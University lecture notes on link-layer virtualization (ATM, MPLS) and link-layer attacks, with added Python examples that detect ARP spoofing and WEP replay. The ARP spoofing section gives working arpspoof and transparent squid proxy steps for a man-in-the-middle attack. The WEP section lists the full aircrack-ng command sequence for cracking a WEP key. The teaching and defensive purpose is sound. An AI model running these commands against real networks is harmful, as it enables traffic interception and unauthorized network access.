CIS3210 – Computer Networks
Link Layer – Virtualization, Vulnerabilities, Security
Jason Ernst, University of Guelph - Fall 2011
Housekeeping
- A3 available this weekend
- 3M scholarship

Outline
- Link Virtualization
- ARP Spoofing
  - Proof of concept – “Upsidedownternet”
- ARP Replay
  - Proof of concept – WEP cracking
Recall: Link Virtualization
- A way to make different underlying network technologies work together using IP
- Ex) ATM, MPLS, 2G cellular networks etc.

Recall ATM (Asynchronous Transfer Mode)
- 1990’s/00 standard for high-speed (155 Mbps to 622 Mbps and higher) Broadband Integrated Service Digital Network architecture
- Goal: integrated, end-end transport to carry voice, video, data
  - meeting timing/QoS requirements of voice, video (versus Internet best-effort model)
  - “next generation” telephony: technical roots in telephone world
  - packet-switching (fixed length packets, called “cells”) using virtual circuits

ATM Architecture
- adaptation layer: only at edge of ATM network
  - data segmentation/reassembly
  - roughly analogous to Internet transport layer
- ATM layer: “network” layer
  - cell switching, routing
- physical layer
ATM: Network or Link Layer?
- Vision: end-to-end transport: “ATM from desktop to desktop”
  - ATM is a network technology
- Reality: used to connect IP backbone routers
  - “IP over ATM”
  - ATM as switched link layer, connecting IP routers
[Figure: an IP network and an ATM network side by side]
ATM Adaptation Layer (AAL)
- ATM Adaptation Layer (AAL): “adapts” upper layers (IP or native ATM applications) to ATM layer below
- AAL present only in end systems, not in switches
- AAL layer segment (header/trailer fields, data) fragmented across multiple ATM cells
  - analogy: TCP segment in many IP packets

ATM Adaptation Layer (AAL) [more]
Different versions of AAL layers, depending on ATM service class:
- AAL1: for CBR (Constant Bit Rate) services, e.g. circuit emulation
- AAL2: for VBR (Variable Bit Rate) services, e.g., MPEG video
- AAL5: for data (eg, IP datagrams)
[Figure: user data is carried in an AAL PDU, which is split across ATM cells]

ATM Layer
Service: transport cells across ATM network
- analogous to IP network layer
- very different services than IP network layer
Service models (Guarantees? = Bandwidth, Loss, Order, Timing):

Network Architecture | Service Model | Bandwidth          | Loss | Order | Timing | Congestion feedback
Internet             | best effort   | none               | no   | no    | no     | no (inferred via loss)
ATM                  | CBR           | constant rate      | yes  | yes   | yes    | no congestion
ATM                  | VBR           | guaranteed rate    | yes  | yes   | yes    | no congestion
ATM                  | ABR           | guaranteed minimum | no   | yes   | no     | yes
ATM                  | UBR           | none               | no   | yes   | no     | no
ATM Layer: Virtual Circuits
- VC transport: cells carried on VC from source to dest
  - call setup, teardown for each call before data can flow
  - each packet carries VC identifier (not destination ID)
  - every switch on source-dest path maintains “state” for each passing connection
  - link, switch resources (bandwidth, buffers) may be allocated to VC: to get circuit-like perf.
- Permanent VCs (PVCs)
  - long lasting connections
  - typically: “permanent” route between two IP routers
- Switched VCs (SVC):
  - dynamically set up on per-call basis

ATM VCs
- Advantages of ATM VC approach:
  - QoS performance guarantee for connection mapped to VC (bandwidth, delay, delay jitter)
- Drawbacks of ATM VC approach:
  - Inefficient support of datagram traffic
  - one PVC between each source/dest pair does not scale (N*2 connections needed)
  - SVC introduces call setup latency, processing overhead for short lived connections
ATM Layer: ATM cell (similar to a packet)
- 5-byte ATM cell header
- 48-byte payload
  - Why?: small payload -> short cell-creation delay for digitized voice
  - halfway between 32 and 64 (compromise!)
[Figure: cell format – cell header followed by payload]

ATM cell header
- VCI: virtual channel ID
  - will change from link to link thru net
- PT: Payload type (e.g. RM cell versus data cell)
- CLP: Cell Loss Priority bit
  - CLP = 1 implies low priority cell, can be discarded if congestion
- HEC: Header Error Checksum
  - cyclic redundancy check

ATM Physical Layer (more)
Two pieces (sublayers) of physical layer:
- Transmission Convergence Sublayer (TCS): adapts ATM layer above to PMD sublayer below
- Physical Medium Dependent: depends on physical medium being used
TCS Functions:
- Header checksum generation: 8 bits CRC
- Cell delineation
- With “unstructured” PMD sublayer, transmission of idle cells when no data cells to send
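As an added illustration of the cell header and of the TCS header-checksum function (this code is written for these notes; it is not from the lecture), the following Python builds and checks a 5-byte ATM UNI cell header. The HEC is the standard ITU-T I.432 definition (CRC-8 with generator x^8 + x^2 + x + 1 over the first four octets, remainder XORed with 0x55), and the header layout is the UNI format, which also carries the GFC and VPI fields the slide does not list. The sample headers are constructed; the idle-cell header 00 00 00 01 52 is the standard reference value.

```python
# Added example for these notes, not code from the lecture slides.
# Builds and verifies the 5-byte ATM UNI cell header. The HEC is the
# ITU-T I.432 CRC-8 (generator x^8 + x^2 + x + 1) over the first four
# header octets, XORed with the coset constant 0x55; a single-bit error
# anywhere in those octets changes the HEC, which is how the TCS sublayer
# rejects corrupted headers during cell delineation.

CRC8_POLY = 0x07    # x^8 + x^2 + x + 1 with the x^8 term implicit
HEC_COSET = 0x55    # I.432 adds this pattern to the CRC remainder


def atm_hec(first4: bytes) -> int:
    """CRC-8 of the first four header octets, XORed with 0x55."""
    if len(first4) != 4:
        raise ValueError("HEC covers exactly the first four header octets")
    crc = 0
    for octet in first4:
        crc ^= octet
        for _ in range(8):            # bitwise long division, MSB first
            if crc & 0x80:
                crc = ((crc << 1) ^ CRC8_POLY) & 0xFF
            else:
                crc = (crc << 1) & 0xFF
    return crc ^ HEC_COSET


def build_uni_header(vpi: int, vci: int, pt: int = 0, clp: int = 0, gfc: int = 0) -> bytes:
    """Pack GFC(4) | VPI(8) | VCI(16) | PT(3) | CLP(1) and append the HEC octet."""
    if not (0 <= gfc < 16 and 0 <= vpi < 256 and 0 <= vci < 65536
            and 0 <= pt < 8 and clp in (0, 1)):
        raise ValueError("header field out of range")
    first32 = (gfc << 28) | (vpi << 20) | (vci << 4) | (pt << 1) | clp
    first4 = first32.to_bytes(4, "big")
    return first4 + bytes([atm_hec(first4)])


def parse_uni_header(header: bytes) -> dict:
    """Unpack a 5-byte header; 'hec_ok' is False when the header is corrupted."""
    if len(header) != 5:
        raise ValueError("an ATM cell header is exactly 5 bytes")
    first32 = int.from_bytes(header[:4], "big")
    return {
        "gfc": first32 >> 28,
        "vpi": (first32 >> 20) & 0xFF,
        "vci": (first32 >> 4) & 0xFFFF,
        "pt": (first32 >> 1) & 0x7,
        "clp": first32 & 0x1,
        "hec": header[4],
        "hec_ok": header[4] == atm_hec(header[:4]),
    }


# Reference value: the idle cell (VPI 0, VCI 0, PT 0, CLP 1) that the TCS sends
# when there is nothing to transmit has the header 00 00 00 01 52.
IDLE_CELL_HEADER = bytes.fromhex("0000000152")

if __name__ == "__main__":
    print("idle cell:", parse_uni_header(IDLE_CELL_HEADER))
    hdr = build_uni_header(vpi=1, vci=32)
    print("VPI 1 / VCI 32:", hdr.hex())
    # Flip one bit in the VCI field (constructed corruption): the HEC no longer matches.
    corrupted = bytes([hdr[0], hdr[1], hdr[2] ^ 0x01, hdr[3], hdr[4]])
    print("corrupted header accepted?", parse_uni_header(corrupted)["hec_ok"])
```

The HEC only protects the header, not the 48-byte payload; payload integrity is left to the AAL (AAL5 carries its own CRC-32 in the trailer), which is why the datagram-journey slide says the datagram is passed up only "if CRC OK".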
ATM Physical Layer
Physical Medium Dependent (PMD) sublayer
- SONET/SDH: transmission frame structure (like a container carrying bits);
  - bit synchronization;
  - bandwidth partitions (TDM);
  - several speeds: OC3 = 155.52 Mbps; OC12 = 622.08 Mbps; OC48 = 2.45 Gbps, OC192 = 9.6 Gbps
- T1/T3: transmission frame structure (old telephone hierarchy): 1.5 Mbps/ 45 Mbps
- unstructured: just cells (busy/idle)
IP-Over-ATM
- Classic IP only
  - 3 “networks” (e.g., LAN segments)
  - MAC (802.3) and IP addresses
- IP over ATM
  - replace “network” (e.g., LAN segment) with ATM network
  - ATM addresses, IP addresses
[Figure: Ethernet LANs joined by routers, versus Ethernet LANs joined by an ATM network]

IP-Over-ATM
[Figure: protocol stacks along the path – source host (app, transport, IP, Eth, phy); edge router / gateway (IP over Eth/phy on one side, IP over AAL/ATM/phy on the other); ATM switches (ATM, phy); destination host (app, transport, IP, AAL, ATM, phy). Translation occurs at edge routers / gateways]
Datagram Journey in IP-over-ATM Network
- at Source Host:
  - IP layer maps between IP, ATM dest address (using ARP)
  - passes datagram to AAL5
  - AAL5 encapsulates data, segments cells, passes to ATM layer
- ATM network: moves cell along VC to destination
- at Destination Host:
  - AAL5 reassembles cells into original datagram
  - if CRC OK, datagram is passed to IP

IP-Over-ATM
Issues:
- IP datagrams into ATM AAL5 PDUs
- from IP addresses to ATM addresses
  - just like IP addresses to 802.3 MAC addresses!
[Figure: Ethernet LANs connected through an ATM network]
Multiprotocol label switching (MPLS)
- initial goal: speed up IP forwarding by using fixed length label (instead of IP address) to do forwarding
  - borrowing ideas from Virtual Circuit (VC) approach
  - but IP datagram still keeps IP address!
[Figure: link-layer frame layout – PPP or Ethernet header | MPLS header (fields: label 20, Exp 3, S 1, TTL 5) | IP header | remainder of link-layer frame]

MPLS capable routers
- a.k.a. label-switched router
- forwards packets to outgoing interface based only on label value (don’t inspect IP address)
  - MPLS forwarding table distinct from IP forwarding tables
- signaling protocol needed to set up forwarding
  - RSVP-TE
  - forwarding possible along paths that IP alone would not allow (e.g., source-specific routing) !!
  - use MPLS for traffic engineering
- must co-exist with IP-only routers
MPLS forwarding tables
[Figure: label-switched routers R1–R6 with hosts A and D; interface numbers 0 and 1 are marked on the links]

R6:
  in label | out label | dest | out interface
           | 10        | A    | 0
           | 12        | D    | 0
           | 8         | A    | 1

R4:
  in label | out label | dest | out interface
  10       | 6         | A    | 1
  12       | 9         | D    | 0

R5:
  in label | out label | dest | out interface
  8        | 6         | A    | 0

R1:
  in label | out label | dest | out interface
  6        | -         | A    | 0
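The following Python is an added example for these notes (not code from the lecture or from any router implementation). It packs and unpacks the 32-bit MPLS shim header (RFC 3032: 20-bit label, 3-bit Exp, 1-bit S, 8-bit TTL) and walks a packet through the routers of the figure above using only the label, which is the point of the slide: the IP address is never consulted, and two packets for the same destination A can take different paths. The table entries for R4, R5 and R1 are the slide's. Everything else is assumed for the sake of a runnable example: the wiring between interfaces, R2 as the egress for D, and a per-source policy at R6 that chooses between the slide's two R6 entries for A.

```python
# Added example for these notes, not code from the lecture slides or a router
# implementation. It packs/unpacks the 32-bit MPLS shim header (RFC 3032: 20-bit
# label, 3-bit Exp, 1-bit S, 8-bit TTL) and forwards a packet through the slide's
# label-switched routers using only the label, never the IP address.
# Table entries for R4, R5 and R1 are copied from the slide. Assumed here: the
# link wiring between interfaces, R2 as the egress for D, and a per-source policy
# at R6 that picks between the slide's two R6 entries for destination A.

def pack_shim(label: int, exp: int = 0, s: int = 1, ttl: int = 64) -> bytes:
    """Build the 4-byte shim that sits between the link-layer and IP headers."""
    if not (0 <= label < (1 << 20) and 0 <= exp < 8 and s in (0, 1) and 0 <= ttl < 256):
        raise ValueError("MPLS shim field out of range")
    return ((label << 12) | (exp << 9) | (s << 8) | ttl).to_bytes(4, "big")


def unpack_shim(shim: bytes) -> dict:
    v = int.from_bytes(shim, "big")
    return {"label": v >> 12, "exp": (v >> 9) & 0x7, "s": (v >> 8) & 0x1, "ttl": v & 0xFF}


# Slide tables: in_label -> (out_label, dest, out_interface); None means pop the
# label and deliver the IP datagram to the attached host.
TABLES = {
    "R4": {10: (6, "A", 1), 12: (9, "D", 0)},
    "R5": {8: (6, "A", 0)},
    "R1": {6: (None, "A", 0)},
    "R2": {9: (None, "D", 0)},   # assumed egress for D (not on the slide)
}

# R6 entries from the slide (out_label, out_interface), keyed here by an assumed
# ingress policy: the source host decides which of the two paths to A is used.
INGRESS_R6 = {
    ("A", "src-X"): (10, 0),
    ("A", "src-Y"): (8, 1),
    ("D", "src-X"): (12, 0),
    ("D", "src-Y"): (12, 0),
}

# Assumed wiring: (router, out_interface) -> neighbour.
LINKS = {("R6", 0): "R4", ("R6", 1): "R5", ("R4", 1): "R1", ("R4", 0): "R2",
         ("R5", 0): "R1", ("R1", 0): "A", ("R2", 0): "D"}


def forward(dest: str, src: str, ttl: int = 64) -> list:
    """Push a label at R6, then label-switch hop by hop; returns the path taken."""
    label, iface = INGRESS_R6[(dest, src)]
    shim = pack_shim(label, ttl=ttl)
    node, path = LINKS[("R6", iface)], ["R6"]
    while True:
        path.append(node)
        hdr = unpack_shim(shim)
        entry = TABLES.get(node, {}).get(hdr["label"])
        if entry is None:
            raise LookupError(f"{node}: no entry for label {hdr['label']}, packet dropped")
        if hdr["ttl"] <= 1:
            raise LookupError(f"{node}: TTL expired, packet dropped")
        out_label, table_dest, out_iface = entry
        node = LINKS[(node, out_iface)]
        if out_label is None:          # egress: pop the label, deliver to the host
            path.append(node)
            return path
        shim = pack_shim(out_label, ttl=hdr["ttl"] - 1)   # swap label, decrement TTL


if __name__ == "__main__":
    for dest, src in (("A", "src-X"), ("A", "src-Y"), ("D", "src-X")):
        print(f"{src} -> {dest}: {' -> '.join(forward(dest, src))}")
```

Running it shows src-X reaching A via R6, R4, R1 and src-Y reaching A via R6, R5, R1, with the label swapped at every hop (10 to 6, or 8 to 6) and popped at R1. The TTL check matters operationally: without it a label entry that loops back would circulate the packet forever, exactly the failure the IP TTL exists to prevent.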
ARP Spoofing Proof of Concept
- Recall ARP is used to tell nodes the mapping between IP address and machine address
- If a node does not know the machine address of a particular node, it sends out an ARP request to all other nodes

ARP Spoofing Proof of Concept
- If a node is located between the requesting node and the default gateway…
  - It can answer the ARP request first (man in the middle attack)
  - It can pretend that it is the default gateway, and manipulate the traffic

ARP Spoofing Proof of Concept
- In our case, we will do this by manipulating caching! (using a proxy)
- Recall: caching is used to store content in an intermediate place reducing RTT and the load on the server out in the Internet

The Proxy
- The tool we will use is the “squid” proxy
- This is important because we can tell squid to run an external program as we handle the request
  - We will use this program to manipulate the traffic
Important Squid Settings
- Allow traffic from expected ip ranges (an acl line needs the acl type, here src):
  acl localnet src 192.168.0.0/16   (for example)
  http_access allow localnet
- Make the proxy transparent (so we don’t need to tell browsers there is a proxy)
  http_port 3128 transparent
- Set the program that will run when we serve the page
  url_rewrite_program /usr/local/bin/flip.pl
Flip program
[Figure: source of the flip program as shown on the slide]

Flip Program
- Should be put in /usr/local/bin
- Permissions should be set to 755
- Requires imagemagick package (mogrify is part of it)
- Can be changed to do other things!
  - Change images to kittens
  - Redirect to a default login page (many coffee shops use this as a capability!)
  - Etc…
Setting up routes for the proxy
- Our ARP attack will force traffic to our machine, but it will still be arriving on port 80; we need to translate it to port 3128 (the squid port)
- We also want to make sure the computer is able to route (act like a gateway)

Setting up routes for the proxy
[Figure: commands shown on the slide – Translation to correct port; Allow routing]
The ARP Attack
- Uses a tool called arpspoof
  - (can get from dsniff ubuntu package)
- arpspoof -t “target ip” “gateway ip”
- Repeatedly sends ARP replies to the IP of the target with gateway IP mapped to your MAC address

What happens from here…
- The target computer should start sending traffic through your machine to the real gateway
- If it is http traffic on port 80 it will get changed to the squid port and sent to the proxy
- The proxy will request the images from the servers, flip them, store them and send the flipped image to the target
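What the attack looks like from the other side of the wire is worth seeing too. The Python below is an added example for these notes (not code from the lecture or from arpspoof/dsniff): a defender-side monitor that reads ARP traffic in the one-line form tcpdump prints for ARP and flags the two things the repeated replies described above produce, a reply that binds an IP to a MAC different from the known (or first-seen) one, and replies that no request preceded. The capture lines, addresses and the "known gateway" binding are all constructed.

```python
# Added example for these notes, not code from the lecture or from any tool it
# names. A defender-side monitor: it reads ARP traffic in the one-line format
# tcpdump prints for ARP (constructed lines below, not a real capture) and flags
# the two things arpspoof-style traffic produces: a reply that binds an IP to a
# MAC different from the known or previously seen one, and replies nobody asked
# for. The expected gateway binding is a constructed example value.
import re

# Constructed sample capture (tcpdump-style lines). The first four lines are a
# normal request/reply exchange in each direction; the last three are replies
# that re-bind the gateway IP to another MAC without any preceding request.
SAMPLE_CAPTURE = """\
12:00:01.000 ARP, Request who-has 192.168.0.1 tell 192.168.0.23, length 28
12:00:01.001 ARP, Reply 192.168.0.1 is-at 00:1a:2b:3c:4d:5e, length 28
12:00:02.000 ARP, Request who-has 192.168.0.23 tell 192.168.0.1, length 28
12:00:02.001 ARP, Reply 192.168.0.23 is-at 00:aa:bb:cc:dd:23, length 28
12:00:05.000 ARP, Reply 192.168.0.1 is-at 02:00:00:00:00:99, length 28
12:00:07.000 ARP, Reply 192.168.0.1 is-at 02:00:00:00:00:99, length 28
12:00:09.000 ARP, Reply 192.168.0.1 is-at 02:00:00:00:00:99, length 28
"""

KNOWN_BINDINGS = {"192.168.0.1": "00:1a:2b:3c:4d:5e"}   # constructed gateway MAC

LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d(?:\.\d+)?) ARP, "
    r"(?:Request who-has (?P<req_ip>[\d.]+) tell (?P<req_from>[\d.]+)"
    r"|Reply (?P<rep_ip>[\d.]+) is-at (?P<rep_mac>[0-9A-Fa-f:]{17}))"
)


def _seconds(ts: str) -> float:
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def parse_arp_lines(text: str) -> list:
    """Turn capture lines into event dicts; lines that are not ARP are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        t = _seconds(m["ts"])
        if m["req_ip"]:
            events.append({"t": t, "kind": "request", "ip": m["req_ip"], "asker": m["req_from"]})
        else:
            events.append({"t": t, "kind": "reply", "ip": m["rep_ip"], "mac": m["rep_mac"].lower()})
    return events


def detect_arp_spoofing(events: list, known: dict = None, solicit_window: float = 2.0) -> list:
    """Return alert tuples. 'known' seeds trusted IP->MAC bindings (e.g. the gateway);
    without it the first reply seen for an IP is trusted, which is weaker."""
    bindings = dict(known or {})
    last_request = {}          # ip -> time of the most recent who-has for that ip
    alerts = []
    for ev in events:
        if ev["kind"] == "request":
            last_request[ev["ip"]] = ev["t"]
            continue
        ip, mac, t = ev["ip"], ev["mac"], ev["t"]
        if ip in bindings and bindings[ip] != mac:
            alerts.append(("binding_conflict", t, ip, bindings[ip], mac))
        else:
            bindings.setdefault(ip, mac)
        asked_at = last_request.get(ip)
        if asked_at is None or t - asked_at > solicit_window:
            alerts.append(("unsolicited_reply", t, ip, mac))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(parse_arp_lines(SAMPLE_CAPTURE), KNOWN_BINDINGS):
        print(alert)
```

Unsolicited replies do occur legitimately (gratuitous ARP after a reboot or failover), so the conflict signal is the strong one; a stream of conflicting, unsolicited replies for the gateway IP is the pattern to alert on. The mitigations that follow from the monitor are a static ARP entry for the gateway on the hosts and, on managed switches, DHCP snooping with dynamic ARP inspection so the switch drops replies that contradict the snooped bindings.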
Results (before)
[Figure]

Results (after)
[Figure]

ARP Spoofing Proof of Concept
- Upsidedownternet:
  - http://www.ex-parrot.com/pete/upside-down-ternet.html
  - https://help.ubuntu.com/community/Upside-DownTernetHowTo
  - http://www.debian-administration.org/users/johns/weblog/1

Ethics
- This is just a proof of concept, should not be used in practice at a real coffee shop, or at the University!
ARP Replay
- Another vulnerability of ARP
- Repeatedly send intercepted ARP requests with the hope that the gateway / access point will continue to send replies
- Access point may think that the original response was lost, and resend it without another thought

ARP Replay
- Why is this useful?
- Generates more traffic on the network
- Can be used to decrease service levels, increase load on the access point etc.
- Most importantly, if the network is using WEP – increases the amount of encrypted traffic being sent from the access point (the ARP responses)

WEP Cracking
- Relies on capturing “initialization vectors” (IVs); the more of these which are captured, the easier it is to infer the WEP key
- More information available here: http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html and here: http://www.aircrackng.org/doku.php?id=simple_wep_crack&DokuWiki=edac829eaed7c68d3bd3fbf3d82c084e

The Idea
- The network should have one associated user already
  - (It is possible to do the attack without a user by a fake association with the access point, but we won’t cover this today)
- We will pretend we are this device by waiting for one of their ARP requests and then re-transmitting it again and again
- At the same time, as the router responds we will capture the responses
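The replay described in the last three slides has a clear signature for anyone watching the air. The Python below is an added example for these notes (not code from the lecture or from the aircrack-ng suite) covering both the ARP Replay and the WEP Cracking slides from the monitoring side: a replayed frame is retransmitted byte for byte, so the 24-bit WEP IV, which is sent in the clear in every frame, repeats from the same transmitter over and over, while a normal sender changes its IV on each frame. The frames are constructed tuples rather than a real capture, and the MAC addresses are made up.

```python
# Added example for these notes, not code from the lecture or from the aircrack-ng
# suite. A monitor-side check for ARP replay against a WEP network: a replayed
# frame is retransmitted byte for byte, so the 24-bit WEP IV carried in the clear
# repeats from the same transmitter, while a normal sender changes the IV every
# frame. Frames are constructed tuples, not a real capture; MACs are made up.
from collections import deque

CLIENT = "02:00:00:00:00:01"   # constructed client (transmitter) address
AP = "02:00:00:00:00:aa"       # constructed BSSID


def sample_frames() -> list:
    """Constructed capture: (time_s, transmitter, bssid, iv, frame_len)."""
    frames, t = [], 0.0
    for i in range(20):                                   # normal traffic, fresh IV each frame
        frames.append((t, CLIENT, AP, 0x100000 + i, 120))
        t += 0.5
    for _ in range(200):                                  # replay burst: same frame, same IV, 100/s
        frames.append((t, CLIENT, AP, 0x1000AB, 68))
        t += 0.01
    return frames


def detect_iv_replay(frames: list, window_s: float = 1.0, threshold: int = 20) -> list:
    """Alert once per (transmitter, IV) seen at least `threshold` times within `window_s`."""
    recent = {}      # (src, iv) -> timestamps inside the sliding window
    alerted = set()
    alerts = []
    for t, src, bssid, iv, length in frames:
        key = (src, iv)
        q = recent.setdefault(key, deque())
        q.append(t)
        while t - q[0] > window_s:
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"src": src, "bssid": bssid, "iv": f"{iv:06x}",
                           "frame_len": length, "repeats": len(q), "at": t})
    return alerts


def iv_reuse_count(frames: list) -> int:
    """Number of (transmitter, IV) pairs that appear more than once in the capture."""
    seen = {}
    for _, src, _, iv, _ in frames:
        seen[(src, iv)] = seen.get((src, iv), 0) + 1
    return sum(1 for n in seen.values() if n > 1)


if __name__ == "__main__":
    frames = sample_frames()
    print("reused (transmitter, IV) pairs:", iv_reuse_count(frames))
    for alert in detect_iv_replay(frames):
        print(alert)
```

An 802.11 retry legitimately repeats a frame (and its IV) once or twice, so the threshold has to stay well above that; hundreds of identical ARP-sized frames per second from one client is not retry behaviour. The only real fix is the one the slides imply: WEP has no replay protection and a 24-bit IV space, whereas WPA2 carries a per-packet replay counter that makes the access point discard the re-sent frames instead of answering them.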
Tools: aircrack-ng suite
- airmon-ng
  - Turns monitor mode on, on the wireless card (similar to promiscuous mode on Ethernet)
  - Allows us to see packets which are not destined for our device
- airodump-ng
  - Captures the packets from the access point
  - Can be set to dump into a file

Tools: aircrack-ng suite
- aireplay-ng
  - Performs the ARP attack, replays any ARP requests from the target device
- aircrack-ng
  - Uses the captured packets to figure out the wireless key
Enabling monitor mode
- sudo airmon-ng
  - Must be run as root
  - First lists the available interfaces
- sudo airmon-ng start wlan0
  - Starts monitor mode on first wireless interface (may be different depending on your wireless interfaces)
  - Usually creates a monitor mode interface on mon0

Displaying available networks & encryption used on them
- sudo airodump-ng mon0
  - Will periodically switch channels and display how many packets are being sent over the channel to particular access points
  - This information can be used to select the network to attack
- sudo airodump-ng -c 1 --bssid 00:1C:F0:68:1D:C2 -w test mon0
  - This will stay on channel 1, and filter only packets to or from the base station with the MAC address above
  - Also writes the captured packets out to a file for later use

ARP Replay
- sudo aireplay-ng -b 00:1C:F0:68:1D:C2 -h 68:a3:c4:f9:06:a0 -3 mon0
  - Looks for ARP requests to the access point at 00:1C:F0:68:1D:C2 with the source 68:A3:C4:F9:06:A0 (the target device)
  - -3 is the ARP replay attack

The attack
sudo airmon-ng start wlan0
sudo airodump-ng -c 1 --bssid 00:1C:F0:68:1D:C2 -w test mon0
sudo aireplay-ng -b 00:1C:F0:68:1D:C2 -h 68:a3:c4:f9:06:a0 -3 mon0
After some time has passed and we notice there are many IVs captured we can run the aircrack-ng tool on the “test” data files:
aircrack-ng *.cap
Ethics
- Again, it is unethical to use this attack in practice. But it is good to demonstrate the weakness in WEP and vulnerabilities related to ARP and the link layer

Next Class
- Finish up with link layer / physical layer
- Assignment #3 overview
- Simulation topics for A3